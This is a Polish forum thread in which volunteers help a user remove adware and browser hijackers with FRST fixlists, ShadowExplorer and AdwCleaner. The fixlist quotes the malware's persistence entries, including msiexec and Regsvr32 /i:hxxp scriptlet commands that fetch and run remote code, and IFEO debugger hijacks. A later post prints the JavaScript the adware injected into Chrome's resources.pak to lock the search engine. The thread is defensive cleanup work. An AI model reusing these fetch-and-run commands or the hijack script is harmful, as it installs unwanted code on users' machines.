2artur2 Opublikowano 20 Czerwca 2017 Zgłoś Udostępnij Opublikowano 20 Czerwca 2017 Komputer kolegi zainfekowany paskudztwem, co zmieniło strony główne przeglądarek i prawdopodobnie podmieniło oryginalne przeglądarki. Załączam pliki, bardzo proszę o pomoc w usunięciu szkodnika. Artur Addition.txt FRST.txt GMER.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 20 Czerwca 2017 Zgłoś Udostępnij Opublikowano 20 Czerwca 2017 Naprawdę spory bałagan. Podmiana oryginalnych przeglądarek na fałszywe, szkodliwe usługi tworzące szereg infekcji adware, zarażone skróty, ale to nie wszystko i można by było wymieniać jeszcze, że "ho ho". I Ty i Twój kolega, proszę przeczytajcie lekturę jak uniknąć podobnych sytuacji w przyszłości: KLIK. 1. Przez panel sterowania odinstaluj: Fałszywe oprogramowanie zabezpieczające i inne szkodniki: ScreenShot, update_server, VideoDownloadConverter Internet Explorer Toolbar, YAC(Yet Another Cleaner!). Sponsorzy instalacyjni / zbędniki: McAfee Security Scan Plus, Badanie mające na celu poprawę produktów HP DeskJet 2130 series. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: S2 NPASRE; C:\Users\user\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 SNARE; C:\Users\user\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2017-02-06] (Filseclab Corporation Limited) S2 terana; C:\Users\user\AppData\Local\terana\terana.dll [909312 2017-05-31] () [brak podpisu cyfrowego] R2 VideoDownloadConverter_4zService; C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbarsvc.exe [89448 2016-01-07] (Mindspark) S2 3DM; C:\Users\user\AppData\Local\3DM\Kitty.dll [X] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 BIT; C:\ProgramData\BIT\BIT.dll [X] S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X] S2 Kitty; C:\Users\user\AppData\Local\Kitty\Kitty.dll [X] S2 VNASRE; C:\Users\user\AppData\Local\VNASRE\Snare.dll [X] S2 WinSAPSvc; C:\Users\user\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] S3 massfilter; system32\DRIVERS\massfilter.sys [X] S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X] S3 ZTEusbnet; system32\DRIVERS\ZTEusbnet.sys [X] S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X] S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X] HKLM-x32\...\Run: [VideoDownloadConverter EPM Support] => C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zmedint.exe [11624 2016-01-07] (Mindspark) HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] Task: {60B10252-8078-4CB8-B709-3C01D8F11E67} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () Task: {76081B4A-A89D-4FE8-9C70-258B2F468250} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== scrobj.dll Task: {B2A4D69A-F4FC-4645-9075-7B61209D5D8B} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {E3D3B381-A71B-4C01-AC74-5D29024991CD} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== scrobj.dll MSCONFIG\startupreg: Plus Internet => C:\Program Files (x86)\Plus Internet\PlusInternetChecker.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} URLSearchHook: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 - (Brak nazwy) - {93a3111f-4f74-4ed8-895e-d9708497629e} - C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zSrcAs.dll (Mindspark) SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM-x32 -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://int.search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm659^YYA^pl&si=CIa5saKxl8oCFcf7cgodt1MPSQ&ptb=5E9A0CA2-FEAA-4D35-BEDE-8753F18FA633&ind=2016010704&n=7829e1d0&psa=&st=sb&searchfor={searchTerms} SearchScopes: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://int.search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm659^YYA^pl&si=CIa5saKxl8oCFcf7cgodt1MPSQ&ptb=5E9A0CA2-FEAA-4D35-BEDE-8753F18FA633&ind=2016010704&n=7829e1d0&psa=&st=sb&searchfor={searchTerms} BHO-x32: Toolbar BHO -> {312f84fb-8970-4fd3-bddb-7012eac4afc9} -> C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbar.dll [2015-12-11] (Mindspark) BHO-x32: Search Assistant BHO -> {c547c6c2-561b-4169-a2a5-20ba771ca93b} -> C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zSrcAs.dll [2015-12-11] (Mindspark) Toolbar: HKLM-x32 - VideoDownloadConverter - {48586425-6bb7-4f51-8dc6-38c88e3ebb58} - C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbar.dll [2015-12-11] (Mindspark) Toolbar: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> Brak nazwy - {48586425-6BB7-4F51-8DC6-38C88E3EBB58} - Brak pliku ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) DeleteKey: HKCU\Software\Eastness DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\Firefox DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\WOW6432Node\Eastness DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions C:\Program Files (x86)\BiaoJi C:\Program Files (x86)\Eastness C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\Firefox C:\Program Files (x86)\MIO C:\Program Files (x86)\ScreenShot C:\Program Files (x86)\VideoDownloadConverter_4z C:\ProgramData\BIT C:\ProgramData\Software C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\user\AppData\Local\3DM C:\Users\user\AppData\Local\background_fault C:\Users\user\AppData\Local\Firefox C:\Users\user\AppData\Local\NPASRE C:\Users\user\AppData\Local\SNARE C:\Users\user\AppData\Local\terana C:\Users\user\AppData\Local\VNASRE C:\Users\user\AppData\Roaming\go00001.bak C:\Users\user\AppData\Roaming\Firefox C:\Users\user\AppData\Roaming\SPTemp C:\Users\user\AppData\Roaming\WinSAPSvc C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\psgo C:\Windows\SysWOW64\00 C:\Windows\SysWOW64\11 C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\55 C:\Windows\SysWOW64\1111 CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Wyłącz COMODO na czas operacji, by nie zablokował zmian. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 3. Kompleksowo wymień profile w przeglądarce Google Chrome oraz Mozilla FireFox. Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. Utracisz wszystko z tych przeglądarek, więc ewentualnie możesz wyeksportować zakładki i ważne linki. Ważne, abyś którąś z powyższych przeglądarek ustawił jako domyślną - inaczej nie cofnie się modyfikacja infekcji. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). eastness;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
2artur2 Opublikowano 20 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 20 Czerwca 2017 Naprawdę sporo tego. Zrobię to wszystko i dam znać. Dziękuję. Odnośnik do komentarza
Miszel03 Opublikowano 20 Czerwca 2017 Zgłoś Udostępnij Opublikowano 20 Czerwca 2017 To nie jest w cale tak dużo, jak mogłoby się wydawać. Każdy krok zajmie Ci ok. 3-5 minut. Odnośnik do komentarza
2artur2 Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Wykonałem wszystkie kroki, załączam logi. Chyba jest ok, ale zauważyłem wyszukiwarkę w chrome (mystarting123), której nie można usunąć. Addition.txt Fixlog.txt FRST.txt SearchReg.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Miszel03 prowadzi temat, więc wtrącam się tutaj pod innym kątem: Chyba jest ok, ale zauważyłem wyszukiwarkę w chrome (mystarting123), której nie można usunąć. Jeżeli z menu ustawiłeś Google jako domyślną, a wyszukiwarka adware nadal wraca i się ustawia samoczynnie jako domyślna, to być może jest tu jakaś niewidoczna na poziomie FRST blokada. Ostatnio to notowalne zachowanie w kilku tematach, pomimo że teoretycznie polityki Google nie zostały wykryte. Na wszelki wypadek proszę skopiuj na Pulpit następujące foldery (o ile są): C:\Windows\System32\GroupPolicy C:\Windows\System32\GroupPolicyUsers C:\Windows\SysWOW64\GroupPolicy C:\Windows\SysWOW64\GroupPolicyUsers Spakuj do ZIP, shostuj gdzieś i podaj link do paczki. Odnośnik do komentarza
Miszel03 Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Po za tym o co prosi picasso, ja poproszę mimo Twojego stwierdzenia o wykonaniu wszystkich kroków o potwierdzenie wykonania punktu 1. Wygląda na to, że ani jeden program nie został odinstalowany. Jeśli jest z tym problem zrób to za pomocą Program Install and Uninstall Troubleshooter. Odnośnik do komentarza
2artur2 Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Moja wina - zapomniałem o punkcie 1. Zdeinstalowałem teraz te programy. Jedynie VideoDownloadConverter Internet Explorer Toolbar nie daje się usunąć, ale to tylko wpis a nie ma takiego katalogu. Co do PolicyGroup, są te katalogi, ale wszystkie są puste, więc nic nie mogę załączyć. Tej wyszukiwarki "mystarting123" nie daje się usunąć z chrome - nie ma nawet "krzyżyka" do jej usunięcia, jak w innych wyszukiwarkach. Nie można też ustawić innej wyszukiwarki. Wykonałem reset ustawień chrome ale bez rezultatu. W Firefoxie jest ok. Odnośnik do komentarza
Miszel03 Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 OK, w takim razie proszę o nowy zestaw raportów FRST, bo deinstsalacje to duże zmiany w systemie. Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Co do PolicyGroup, są te katalogi, ale wszystkie są puste, więc nic nie mogę załączyć. Tej wyszukiwarki "mystarting123" nie daje się usunąć z chrome - nie ma nawet "krzyżyka" do jej usunięcia, jak w innych wyszukiwarkach. Nie można też ustawić innej wyszukiwarki. Wykonałem reset ustawień chrome ale bez rezultatu. W Firefoxie jest ok. Jeśli na pewno te katalogi są puste, to dostarcz więcej danych do analizy. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: Folder: C:\Windows\PolicyDefinitions Zip: C:\Program Files (x86)\Google;C:\Users\user\AppData\Local\Google Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Na Pulpicie powstał też plik data_czas.zip. Shostuj go gdzieś i podaj link do paczki. Odnośnik do komentarza
2artur2 Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Załączam logi FRST po usunięciu wpisu z programu VideoDownloadConverter Internet Explorer Toolbar w Dodaj/Usuń programy oraz zdeinstalowaniu Chrome wraz z katalogami Google w Local i Roaming. Spróbuję jeszcze zainstalować chrome zupełnie od nowa. Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Następnym razem proszę nie podejmuj się akcji spoza zadanej puli działań, bo występują utrudnienia. Niestety odinstalowałeś Google Chrome uniemożliwiając mi diagnozę usterki w Chrome. Reinstalacja Chrome zostałaby podana pewnie potem (i jestem przekonana, że po niej wyszukiwarka nie wraca). Ale nie o to tu mi chodziło. Informacja gdzie konkretnie siedzi ta blokada jest mi potrzebna, bo może uda się to dodać do detekcji narzędzi. Są punkty Przywracania systemu, czyli kopie poprzednich katalogów Google powinno się dać wyłuskać do analizy. Uruchom ShadowExplorer, wybierz datę odpowiadającą temu punktowi gdy Chrome jeszcze było w systemie: 21-06-2017 08:42:16 Restore Point Created by FRST Przekopiuj poniższe foldery na Pulpit: C:\Program Files (x86)\Google C:\Users\user\AppData\Local\Google C:\Users\user\AppData\Roaming\Google Spakuj do ZIP, shostuj gdzieś i podaj link. Odnośnik do komentarza
2artur2 Opublikowano 21 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 OK, chciałem przyspieszyć i dlatego takie działania. Po ponownej instalacji Chrome wydaje się, że komputer jest zdrowy. Podaję link do wspomnianych folderów wyciągniętych z Restore Point (454MB): https://drive.google.com/open?id=0B4-riz4oYd02ZXU5NnZhQU9lY3M Odnośnik do komentarza
picasso Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Dzięki za pliki. Wszystko jasne. To nie nowy trik, tylko tu użyty w nowym kontekście (blokada wyszukiwarki). Adware zmodyfikowało globalny plik zasobów C:\Program files (x86)\Google\Chrome\Application\[wersja]\resources.pak wstawiając skrypt ustawiający "domyślną wyszukiwarkę" w sposób permanentny: //Yrrehs is here var default_search_engine_name = 'mystarting123',default_search_engine_keywords = 'mystarting123',url = 'http://www.mystarting123.com/search/index.php?z=2edce67d80ffd74f08dc489gbz5tfw3qfw9g8o4z2q&q=%s';var index = (this.defaultsList_.dataModel.length + this.othersList_.dataModel.length - 1);var alreay_exists = false;for (var i = 0; i < this.defaultsList_.dataModel.length; ++i) {if (this.defaultsList_.dataModel.array_[i].name === default_search_engine_name) {index = i;alreay_exists = true;break;}}for (var i = 0; i < this.othersList_.dataModel.length && !alreay_exists; ++i) {if (this.othersList_.dataModel.array_[i].name === default_search_engine_name) {index = i + this.defaultsList_.dataModel.length;alreay_exists = true;break;}}if (alreay_exists) {chrome.send('managerSetDefaultSearchEngine', [index]);} else {chrome.send('editSearchEngine', [String(-1)]);chrome.send('searchEngineEditCompleted', [default_search_engine_name, default_search_engine_keywords, url]);chrome.send('managerSetDefaultSearchEngine', [index]);}}, }; . Ta modyfikacja jest niewykrywalna przez FRST i nie będzie. Już dawno temu zgłaszałam adware modyfikujące resources.pak i niestety nie było możliwe dodać detekcję. By to wyleczyć, albo szuka się poprzedniej poprawnej kopii pliku (np. via Shadow Explorer), albo reinstaluje przeglądarkę (tu już zrobione). Czyli nic więcej nie trzeba tu robić pod tym kątem, a ja wszystko już wiem. Odnośnik do komentarza
Miszel03 Opublikowano 21 Czerwca 2017 Zgłoś Udostępnij Opublikowano 21 Czerwca 2017 Widzisz - na tym forum czasem i userzy proszący o pomoc mogą pomóc innym. Skąd przecież musimy brać dane Wszystko pomyślnie wykonane, tym samym wszystko zostało wyczyszczone.Małe poprawki kończące oraz skan potwierdzający wynik dezynfekcji. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: DeleteKey: HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\e04bcfda_0DeleteValue: HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Eastness\Application\chrome.exeToolbar: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak plikuFF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku]FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku]DeleteQuarantine: Z klawiatury CTRL+S, by zapisać zmiany. Wyłącz COMODO na czas operacji, by nie zablokował zmian. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Na razie wybierz tylko opcję Szukaj (nie stosuj jeszcze Oczyść) i dostarcz log z folderu C:\AdwCleaner. Odnośnik do komentarza
2artur2 Opublikowano 22 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 22 Czerwca 2017 Tak sądziłem, że mogę być źródłem informacji Dziękuję bardzo za pomoc. Załączyłem logi z FRST i AdwCleaner. AdWCleaner wykrył 138 zagrożeń. Fixlog.txt AdwCleanerS0.txt Odnośnik do komentarza
Miszel03 Opublikowano 22 Czerwca 2017 Zgłoś Udostępnij Opublikowano 22 Czerwca 2017 Zagrożenie wykryte przez AdwCleaner daj do kasacji, a następnie podsumuj obecny stan systemu. Odnośnik do komentarza
2artur2 Opublikowano 22 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 22 Czerwca 2017 AdwCleaner skasował wykryte problemy, dodatkowo zaktualizowałem Firefoxa. Według mnie system działa prawidłowo. Jeszcze raz bardzo dziękuję za pomoc i poświęcony czas. Artur Odnośnik do komentarza
Miszel03 Opublikowano 22 Czerwca 2017 Zgłoś Udostępnij Opublikowano 22 Czerwca 2017 W takim razie kończymy. Zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne / Windows. Zamykam. Odnośnik do komentarza
